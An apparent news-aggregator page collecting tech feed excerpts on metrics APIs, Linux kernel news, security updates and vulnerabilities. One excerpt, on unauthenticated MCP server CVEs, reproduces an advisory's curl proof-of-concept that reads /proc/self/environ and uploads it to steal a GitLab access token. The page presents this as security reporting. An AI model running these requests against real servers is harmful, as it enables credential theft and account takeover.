Painel de Notícias

Tecnologia

766 posts · 27 feeds · tópicos e interesse por Jev

dev.to

How to Audit 4 Hosted Metrics Dashboard API Options for Small SaaS

A small SaaS should choose a hosted metrics dashboard API by testing whether it can preserve four incident signals across a rollback: request outcomes, latency, queue age, and deployment identity. The cheapest-looking chart is irrelevant if a reverted release changes labels, duplicates counters, or erases the boundary between the faulty version and the recovery. Start with the retention bill, keep the evidence needed to reconstruct a customer-support incident, and treat charts and alerts as replaceable views over that evidence. Short answer: send bounded, versioned metrics from the application, retain enough regional and deployment context to compare US and EU behavior, and evaluate any hosted service through export, replay, and rollback drills. Do not let the dashboard become the only audit trail. For custom application metrics, the dominant term is usually not the number of attractive charts. It is the number of time series retained over time: every metric name combined with every distinct label set produces another series. A support endpoint labeled by region, operation, outcome, and release stays bounded; adding customer_id, ticket_id, or raw error text makes its cardinality track business activity and defeats a predictable retention plan. Put numbers on the design before choosing an API. Consider an explicit planning model, not a benchmark: 4 signals, 2 regions, 6 operations, 3 outcomes, and 2 simultaneously relevant releases produce at most 288 active combinations. A customer identifier with 10,000 possible values would multiply the model into millions of combinations. The exact storage charge depends on the service, aggregation, scrape or push interval, and retention policy, but the architectural result does not: bounded dimensions are suitable for metrics; incident-specific identity belongs in a durable event record. For a small Node.js SaaS backed by Postgres, the runtime and database do not change that arithmetic; they change where the durable event can be

InfraDev
Interesse
dev.to

MCP Servers Had a Rough 48 Hours: 4 Unauthenticated CVEs

Between Monday morning and Tuesday night this week, four Model Context Protocol servers published CVE records for the same basic failure: every tool they expose is reachable with no authentication. A GitLab server that reads any file on its host and uploads it wherever the request asks. A gateway that runs a program chosen by whoever can POST to it. A MySQL tool that hands its database and filesystem to the network. And an IBM sandbox whose escape comes down to two string concatenations. NVD published all four records in roughly 35 hours. I write about MCP security most weeks. On Tuesday I published a plain-language primer on the attack classes (What Is MCP Security? Common Attacks and How to Scan Your MCP Servers), and my working theory has been that the protocol's real risk lives in defaults, not in exotic prompt injection. This week read like a validation set. I pulled all four NVD records, the GitHub advisories, and the fix commits this morning, and as of publish time I found zero writeups on Hacker News or Dev.to for any of the four. A fifth record belongs in this story: LiteLLM's MCP authentication bypass has been on CISA's KEV list since September 2 and is, per CISA's coordinator scoring, under active exploitation. Here is the first one, in the advisory's own request shape: # From GHSA-cv3r-c5h8-f4g5 (CVE-2026-61560), request shape simplified from the # advisory's own PoC. Run against hosts you own only. # 1. Connect to the SSE endpoint and capture a session id. No auth required. curl -N http://target:3002/sse # 2. Ask the server to read any local file and upload it into a GitLab project. curl -X POST "http://target:3002/messages?sessionId= " \ -d '{"tool": "upload_markdown", "args": {"file_path": "/proc/self/environ"}}' # 3. Retrieve the upload from the GitLab project. The environment file contains # GITLAB_PERSONAL_ACCESS_TOKEN, which is the whole GitLab account. No login screen. No exploit code I had to write. The file read is a feature the tool advertises

SegurançaInfraDevIA
Interesse
dev.to

NetScaler RCE: 3 Checks Before Your Next Patch Window

[ internet ] ──► ┌──────────────────────┐ ──► [ your VPN users ] │ NetScaler ADC / GW │ │ CVE-2026-88771 9.5 │ unauthenticated │ CVE-2026-88772 9.5 │ remote code execution └──────────────────────┘ Two zero-day remote code execution bugs in Citrix NetScaler ADC and NetScaler Gateway were confirmed actively exploited before any patch existed, and the first public warnings came from a Reddit thread, not the vendor. Citrix shipped fixes on September 27, but there is a detail buried in the advisory that most teams will miss: if you patched last month for the authentication bypass, your current build is still vulnerable to both of these. I was following the watchTowr thread on X when this broke, and cross-checked it against Citrix's advisory, the Tenable FAQ, and the r/Citrix threads before writing this. Everything below comes from those primary sources. One honesty note: I do not run a NetScaler fleet myself, so treat this as a triage plan built from public records, not field experience. Adapt the paths and endpoints to your environment. CVE-2026-88771 is improper input validation leading to unauthenticated arbitrary command execution. Citrix says it affects all deployments in the affected version range, with no extra feature needed to be enabled. That makes it the scarier of the two: if your appliance is in the range, the precondition is just reachability. CVE-2026-88772 is a memory overflow that can end in remote code execution or denial of service, and it requires DTLS to be enabled. That is the trap: DTLS is on by default for NetScaler Gateway VPN virtual servers unless someone explicitly turned it off. A "we don't use that feature" assumption does not protect a default install. Both score 9.5. Neither is related to the August authentication bypass pair, CVE-2026-19490 and CVE-2026-19489. Because the builds that fixed the last round of flaws are inside the affected range for this round. If you are on 14.1-73.32 or 13.1-63.21, the builds released August 19 for CVE-202

SegurançaInfra
Interesse
dev.to

6,918 Paperless matches: a document archive that was meant to replace the filing cabinet

6,918 Paperless matches: a document archive that was meant to replace the filing cabinet Paperless-ngx scans paper documents, runs optical character recognition over them, and stores the result as searchable files. Teams adopt it to stop losing invoices and contracts, which means the archive ends up holding exactly the records a company must protect. all scope. Some of those matches are unrelated projects that share the word, so the Paperless-ngx share of the total is smaller. A document archive is an identity record in disguise. Invoices carry bank details and addresses. Contracts name signatories. Employment paperwork includes national identifiers. Once scanned and indexed, all of it becomes searchable text with a single query box in front of it. Self-hosted deployments usually authenticate against a local user table, and many rely on a reverse proxy for TLS. The frequent mistakes are familiar. Accounts are created for family members or temporary staff and never removed. The archive sits on a public hostname because remote access was convenient. Backups are written to the same volume, so a compromise takes the copies too. Establish whether the archive must be reachable without a VPN. For most households and small teams the answer is no, and closing the port removes the risk entirely. The count is a starting point for scoping; an operator can restrict the query to their own address space and verify that nothing answers unexpectedly. The link reproduces the query used here. Paperless-ngx documentation: https://docs.paperless-ngx.com/ ZoomEye search, query title="Paperless", scope all, retrieved 2026-10-03, count 6,918

SegurançaInfra
Interesse
Simon Willison

We're going to need default hard budget caps on pretty much everything

Here's a product feature which the world is going to need a whole lot more of over the coming months and years: default hard budget caps . I'm talking about the feature of pay-by-usage services and APIs that lets you say "after $X/month, cut this thing off and return errors". These need to be hard limits. Soft caps, "after $X/month, send me a warning email", will not cut it. Coding agents, and personal agents (coding agents wrapped in a less threatening UI), greatly reduce the friction of spinning up code that can do useful things. Sometimes those things cost money - calls to paid APIs, or hosted web applications, or systems that can bill for additional storage and compute. Nobody wants to wake up to an email sent at midnight warning about a budget limit and find that, while they slept, their rogue service had consumed several hundred (or several thousand) more dollars of usage. An argument against this is that businesses don't want their hosted applications to start throwing errors because some budget was exceeded. I expect that most businesses and individuals would prefer errors to a surprise $10,000+ bill. I think hard budget caps need to be the default. If someone wants to live dangerously they should be able to do that, but it needs to be on an opt-in basis. Have a nice, clear checkbox somewhere prominent: Remove the budget cap. My application will not be shut down if I exceed the configured budget limit, and I will be responsible for subsequent charges. The service I most want to see this from is AWS. I've heard plenty of stories from people who refuse to use AWS for personal projects out of (justified) fear that a runaway service might bankrupt them. I've also heard stories from people who didn't anticipate this and ended up seriously burned. ... and it turns out AWS finally launched spending limits a few weeks ago! From their announcement New AWS experience helps builders get started and ship faster on 16th September: When you're ready to upgrade to a paid p

InfraIA
Interesse
Phoronix

The Amazing Work By Valve's Timur Kristóf On Improving Old AMD GPUs On Linux

Over the past year Timur Kristóf of Valve's Linux graphics driver team has made multiple very nice improvements to the AMDGPU kernel driver for enhancing support for old (GCN 1.0/1.1 era from a decade ago) graphics cards so that they can better handle Linux gaming and other tasks. This week in Toronto, Kristóf presented on this AMDGPU work that he initially began as a kernel driver development exercise after initially spending years in user-space focused on the Mesa 3D driver code...

LinuxInfraDevGames
Interesse
Engadget

Why Windows 11 is always using so much RAM

Windows 11 might be using a lot of your RAM, which isn't a problem unless you experience poor performance. It helps your system run more smoothly.

Infra
Interesse
Hacker News

FTL: A new operating system for clouds

https://github.com/nuta/ftl Comments URL: https://news.ycombinator.com/item?id=49944912 Points: 145 # Comments: 59

InfraDev
Interesse
Hacker News

Watson Jr. memo about CDC 6600 (1963)

Article URL: https://www.computerhistory.org/revolution/supercomputers/10/33/62 Comments URL: https://news.ycombinator.com/item?id=49943685 Points: 15 # Comments: 10

Infra
Interesse
LWN

Seven stable kernels for Saturday

Greg Kroah-Hartman has announced the release of the 7.2.9, 6.18.55, 6.12.112, 6.6.158, 6.1.189, 5.15.222, and 5.10.271 stable kernels. Each contains a large number of important fixes throughout the tree; users are advised to upgrade.

LinuxInfra
Interesse
Phoronix

Linux 7.4 To Support The Raspberry Pi 10-Inch Touch Display 2

We are nearing the cut-off of new feature material being accepted to DRM-Next ahead of the Linux 7.4 merge window. But this week another round of DRM-Misc changes made it, which included some new hardware support and other last minute items...

LinuxInfra
Interesse
Phoronix

Linux 7.4 To Introduce Initial Device Trees For Apple M4, A18 Pro For MacBook Neo

Asahi Linux developer Sven Peter today sent out the pull requests of the Apple SoC Device Tree changes they are ready to upstream for the Linux 7.4 merge window happening later this month. Most notable is the initial Device Tree for Apple systems using the base M4 SoC model as well as for the MacBook Neo with the A18 Pro SoC...

LinuxInfra
Interesse
LWN

Linux Test Project suite stable release for September 2026

The Linux Test Project has announced its latest stable release for September 2026. There have been 382 patches from 41 authors since the May 2026 release. See the announcement for a list of new tests, changes, and more.

LinuxInfraDev
Interesse
LWN

Security updates for Friday

Security updates have been issued by AlmaLinux (dogtag-pki, expat, freerdp, gawk, gdb, ghostscript, gvfs, kernel, kernel-rt, libpcap, openssh, pki-core, rsync, thunderbird, and webkit2gtk3), Debian (chromium, firefox-esr, libio-compress-perl, libpng1.6, nodejs, open-iscsi, redis, thunderbird, and webkit2gtk), Fedora (sos), Mageia (libgcrypt, python-tornado, python-urwid, python-wcwidth, and wireshark), Oracle (corosync, dogtag-pki, expat, firefox, freerdp, gawk, glib2, ipa, kernel, libXfont2, nodejs:24, openssh, osbuild-composer, perl-DBI, pki-core, postgresql:12, python-cryptography, resteasy, ruby, ruby4.0, ruby:3.3, ruby:4.0, thunderbird, and xmlrpc-c), Red Hat (skopeo), SUSE (chromium, emacs, glib2, glibc, gnome-shell, helm3, ImageMagick, imagemagick, kernel-devel, libtcnative-1-0, libtcnative-1-0, libtcnative-2-0, tomcat, tomcat10,, libtcnative-2-0, libX11, libX11-6, libXi-devel, libXpm-devel, libXtst-devel, mistral-vibe, openssl-3, perl-DBI, perl-Protocol-HTTP2, php-composer2, php8, python, rpcbind, sccache, and valkey), and Ubuntu (kf6-kcoreaddons, libxpm, linux, linux-aws, linux-fips, linux-kvm, linux-lts-xenial, linux-fips, linux-gke, linux-raspi-5.4, and openssl).

SegurançaInfraDevLinux
Interesse
Phoronix

Apex Compute Developing Open-Source Mesa Vulkan Driver For Their Hardware

Apex Compute is the company started in California in 2024 that aims to produce high-efficiency AI accelerators for real-time edge AI inferencing. So far they have an FPGA prototype for licensing and deployment and carries the bold claim of being "20x faster than the NVIDIA Jetson" and at under 10W and one fifth the cost. Making Apex Compute much more interesting to us now is that they are developing an open-source, Mesa-based Vulkan driver for their hardware...

LinuxInfraDev
Interesse
Phoronix

Nearing A 10 Second Kernel Build, Xeon 600 & Other September Excitement On Phoronix

During the past month on Phoronix were 284 original news articles and another 19 featured Linux hardware reviews/multi-page benchmark articles. A lot of exciting happenings both on the hardware and software fronts while October is sure to be another interesting month with the releases of Ubuntu 26.10, Fedora 45, and some more hardware fun...

LinuxInfra
Interesse
Phoronix

Some Networking Fixes Being Diverted To Linux 7.4, AI/LLM Activity Still Increasing

With the vast array of wired and wireless networking drivers within the Linux kernel and range of protocols and other networking features, it's a big expanse of code for AI/LLM agents to analyze and critique. The Linux networking developers have acknowledged being "complete overwhelmed" by the AI/LLM-driven patch activity and bug reports as well as battling against AI slop patches. Even though Linux 7.3 stable won't be out for another three weeks, some networking fixes are already being diverted to the next kernel version...

LinuxInfraDevIA
Interesse
LWN

[$] Coping with the onslaught of kernel security bugs

By now it is no secret that large language models (LLMs) have made it easy for people to identify security bugs, and that has resulted in a flood of bug reports to almost every free-software project, including the kernel. At the 2026 edition of Kernel Recipes, Greg Kroah-Hartman took the stage to talk about how the kernel's security team is handling this deluge. His core message was "don't panic".

SegurançaInfra
Interesse
LWN

Security updates for Thursday

Security updates have been issued by AlmaLinux (corosync, gawk, gdb, nodejs24, and thunderbird), Debian (expat, firefox-esr, libsmpp34, mkvtoolnix, network-manager-l2tp, pgextwlist, python-django, ruby-oj, and tor), Fedora (apptainer, ckermit, ffmpeg, freerdp, librabbitmq, openbao, php, python-cssselect2, python-uv-build, ruff, rust-libcst, rust-libcst_derive, rust-salsa, rust-salsa-macro-rules, rust-salsa-macros, sos, ty, uv, weasyprint, and xdg-dbus-proxy), Mageia (python-pillow), Red Hat (acl, glib2, go-toolset:rhel8, golang, libxml2, mingw-sqlite, nodejs-nodemon, nodejs22, nodejs24, nodejs:22, nodejs:24, sqlite, tesseract, and vim), Slackware (libpng and mozilla-thunderbird), SUSE (alloy, chromedriver, emacs, gdb, gimp, gpsd, jawn, libpoppler-cpp3, libtesseract5, multipath-tools, netty, ntfs-3g_ntfsprogs, pcapplusplus-devel, pi-coding-agent, python-PyYAML, python-tornado, python-tornado6, python311, python313, and wicked2nm), and Ubuntu (designate, gst-plugins-bad1.0, gvfs, imagemagick, kdenlive, mlt, keystone, libauthen-sasl-perl, linux-aws, linux-aws-6.8, linux-nvidia-tegra, linux-nvidia-tegra-igx, linux-oracle-7.0, opensbi, openvpn, and python-django).

SegurançaInfraDevLinux
Interesse
Phoronix

AMD RMPOPT Optimization Queued Ahead Of Linux 7.4

In addition to the very nice AMDGPU IOMMU optimization for iGPUs set to debut in the Linux 7.4 kernel, over on the AMD EPYC server side for servers running SEV-SNP virtual machines is a separate, nice optimization also expected for this next kernel version...

LinuxInfra
Interesse
Phoronix

Clearing Out Linux's Old 32-bit ARM Platform Code Is Itself A Challenge

Longtime ARM Linux maintainer Arnd Bergmann over the past year has been working to clear out a number of old ARM platforms from the mainline kernel tree. With Linux 7.3 many older 32-bit ARM platforms were deprecated and in turn hundreds of kernel drivers orphaned. Now it's on to removing that actual code, which given the amount of entangled code, is itself a challenge...

LinuxInfraDev
Interesse
Phoronix

Intel Optimization Zone 1.2 Released With New Guides & Recommendations

Earlier this year Intel announced the "Optimization Zone" as their new initiative to provide a centralized place to collect all their resources for maximizing performance and software tuning on Intel hardware platforms. They've continued building out more resources for the Intel Optimization Zone and yesterday released v1.2 with more tuning guides and best practices for optimal performance on Intel hardware...

Infra
Interesse
freeCodeCamp

How to Debug a Stuck Kubernetes Rollout with a Hands-On Lab

You update a Deployment, run kubectl rollout status, and wait. The command times out. But when you send a request to the Service, it still answers. So did the update finish? And if it didn't, which Po

InfraDev
Interesse
LWN

[$] LWN.net Weekly Edition for October 1, 2026

Inside this week's LWN.net Weekly Edition: Front: PostgreSQL and the kernel; Rust on the GPU; KDE Plasma; C and memory safety; Rust radio; KDE funding; Chromium development. Briefs: File-notification attacks; Kernel report; TAB election; F-Droid 2.0; Firefox 157.0; GDB 18.1; Git v2.56.0; Quotes; ... Announcements: Newsletters, conferences, security updates, patches, and more.

LinuxInfraDev
Interesse
9to5Mac

Apple TV is currently down for some users, as other Apple services also face issues [U]

Update, September 30, 7:37 p.m. ET: Apple says all of the outages have now been resolved, with the exception of Apple TV. Update, October 1, 8:00 p.m. ET: Apple says the Apple TV issue has finally been resolved. Apple is currently reporting issues affecting Apple TV and subscription purchases, while some users are also running into problems elsewhere across the company’s services. Here are the details. more…

InfraMobile
Interesse
LWN

Security updates for Wednesday

Security updates have been issued by AlmaLinux (389-ds:1.4, container-tools:rhel8, go-toolset:rhel8, grafana, httpd:2.4, nodejs:22, postgresql:12, and postgresql:15), Debian (libwebsockets, openssl, and pcre2), Fedora (adwaita-icon-theme, cinnamon, dconf, epiphany, flatpak-builder, gcr, gdm, gjs, glib-networking, glib2, gnome-backgrounds, gnome-calendar, gnome-characters, gnome-chess, gnome-clocks, gnome-connections, gnome-console, gnome-contacts, gnome-control-center, gnome-desktop3, gnome-initial-setup, gnome-keyring, gnome-kiosk, gnome-maps, gnome-remote-desktop, gnome-settings-daemon, gnome-shell, gnome-shell-extensions, gnome-system-monitor, gnome-text-editor, gnome-user-docs, gnote, gnucash, gnucash-docs, gsettings-desktop-schemas, gtk4, hplip, libadwaita, libdex, libsecret, libshumate, libxmp, mingw-llvm, mutter, nautilus, parted, perl-Imager, quadrapassel, rootlesskit, rygel, shotwell, sngrep, sushi, sysprof, tecla, thunderbird, xdg-desktop-portal-gnome, and xdotool), Red Hat (buildah, container-tools:rhel8, containernetworking-plugins, delve, git-lfs, grafana, grafana-pcp, host-metering, ignition, image-builder, osbuild-composer, podman, rhc, rhc-worker-playbook, runc, skopeo, yggdrasil, and yggdrasil-worker-package-manager), Slackware (mozilla-firefox), SUSE (389-ds, amazon-cloudwatch-agent, cjose, corosync, cosign, cups, distribution-registry, expat, firefox, flatpak, glib2, google-osconfig-agent, goose, helm, ImageMagick, jackson-annotations, jackson-bom, jackson-core, jackson- databind, jackson-dataformat-xml, jackson-dataformats-binary, jackson-modules- base, jackson-core, jackson-databind, jackson-dataformat-csv, jsoup, re2j, kbd, kernel, kubectl-cnpg, libpcap, libsoup, libtpms, libX11, libXrender, netty, netty-tcnative, pcre2, perl-Authen-SASL, perl-DBI, python-pymongo, python310, python311, swtpm, terraform-provider-susepubliccloud, and util-linux), and Ubuntu (atril, booth, c-ares, catdoc, dracut, emacs, erlang, freeipmi, libdbi-perl, libheif, linu

SegurançaInfraDevLinux
Interesse
Simon Willison

S3 Is the Future, S3 Is the Past

My comment on S3 Is the Future, S3 Is the Past — Hacker News. One thing I find notable about S3 today is that, while it used to drop in price reasonably often, there hasn't been a price drop in a full decade : 2006-03-14 $0.150/GB-month 2010-11-01 $0.140/GB-month 2012-02-01 $0.125/GB-month 2012-12-01 $0.095/GB-month 2014-02-01 $0.085/GB-month 2014-04-01 $0.030/GB-month 2016-12-01 $0.023/GB-month Today it's still $0.023/GB-month. Tags: amazon-web-services , s3

Infra
Interesse
Simon Willison

We just shipped support for the ugliest part of HTTP: Vary

My comment on We just shipped support for the ugliest part of HTTP: Vary — Hacker News. I've been wanting this from Cloudflare for years . The classic problem here is if you do that thing where user agents that send "accept: text/html" get HTML, while user agents that don't get JSON or some other format. This used to be impossible to deploy behind Cloudflare caching, because they ignored the Vary header on anything other than images - so you risked caching the JSON version and then serving it up to someone who was expecting HTML. (Independent of the Cloudflare feature I ended up deciding never to use that pattern, because I prefer having URL that predictably returns HTML or JSON - I add a .json suffix to my apps to serve JSON instead.) Tags: http , cloudflare

InfraDev
Interesse